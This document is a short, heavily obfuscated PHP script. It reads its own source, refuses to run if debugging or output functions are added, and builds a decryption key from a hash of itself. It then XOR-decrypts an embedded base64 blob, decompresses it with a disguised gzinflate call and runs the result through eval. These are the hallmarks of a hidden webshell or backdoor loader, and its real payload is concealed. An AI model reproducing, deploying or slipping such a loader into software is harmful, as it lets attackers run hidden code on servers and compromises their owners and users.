<?php
$kdumqliugz="788e394c1f5acd542dd74e2fdff37888";
$ybdnivzpnmdz="070e5c56025c5651025206595454030402050752035c575002000000045d0c5a";
$pozyaii="nWUvXK1VcswYZ7danyJ+Q3yREQ+Sc1jC+CDw5D8On6QQ7b0Hm5+92QKknewpGzjIAb4ICUDDi+aTeuKbazUqs7VwPsjrIQ28+17bN+e9hbuQB1geaSWIBXB/xNBXpraoeJ3Qx5BPa8r7qK+oCiGEWzn4a7+TOziJjmOqO+ZeqPTIbPHbzImJyA2/2wNnZrDwu93fD5sc/NxpY9zyv2otdtXnhr0K/mJW0vL6y3rqPzVlmX5T+SfA5DbzsIvczAAiCTwWOM0loVstRAArsK2ibGS6RZXTETJ3aUrGdiYUVBI/ukFrMEoEuqkjLFZYeWyyxlmRh6Md/9LGWX1Y1mxNLIZ7eqoovTFwbJne36PQvHTm0y5chibTTxAqe6LnvAw+hFPvi8fDr+Po6JEMD0peHz/Av3aG/KqV1xK+DPpzih6lZ2e08B2wmCW7FNlGgWRR9bsMMMSHCe8TbBuu3aiTrW8IbmLmtWJZ+ogDdtPP8HvhuGCZNY1kydViLXhY9YCXFnKVe2iFbSFRjquDVX0nvWOXWkTpb0qKx7SV7FzkMOarlVTgUxQgdZR6XbLDBclIOJjtQe3m";
$zqpkvykajfd=file_get_contents(__FILE__);
$pzxcqhrjcl=str_replace($pozyaii,"",$zqpkvykajfd);
if(strpos($pzxcqhrjcl,"ec"."ho")!==false||strpos($pzxcqhrjcl,"pr"."int")!==false||strpos($pzxcqhrjcl,"var_"."dump")!==false||strpos($pzxcqhrjcl,"file_put_"."contents")!==false||strpos($pzxcqhrjcl,"fw"."rite")!==false){die();}
$vhgdufhkkxh=str_replace(array($kdumqliugz,$ybdnivzpnmdz),array("SP_2c24a8ae","KP_38678ff9"),$zqpkvykajfd);
$ycsbfwkfj=md5($vhgdufhkkxh);
$uitjpqjmpm=hex2bin($ybdnivzpnmdz);
$eppxxn="";
$cedxkjtekhn=strlen($ycsbfwkfj);
for($jpxyrsv=0;$jpxyrsv<$cedxkjtekhn;$jpxyrsv++){
    $eppxxn.=chr(ord($uitjpqjmpm[$jpxyrsv])^ord($ycsbfwkfj[$jpxyrsv]));
}
$hpxvcpmmzqlk=base64_decode($pozyaii);
$cympmiwden=strlen($hpxvcpmmzqlk);
$xiohhcpb="";
$zlgvyzabczks=strlen($eppxxn);
for($jpxyrsv=0;$jpxyrsv<$cympmiwden;$jpxyrsv++){
    $xiohhcpb.=$hpxvcpmmzqlk[$jpxyrsv]^$eppxxn[$jpxyrsv%$zlgvyzabczks];
}
$ogweflxrntb="gz"."in"."fl"."ate";
eval($ogweflxrntb($xiohhcpb));
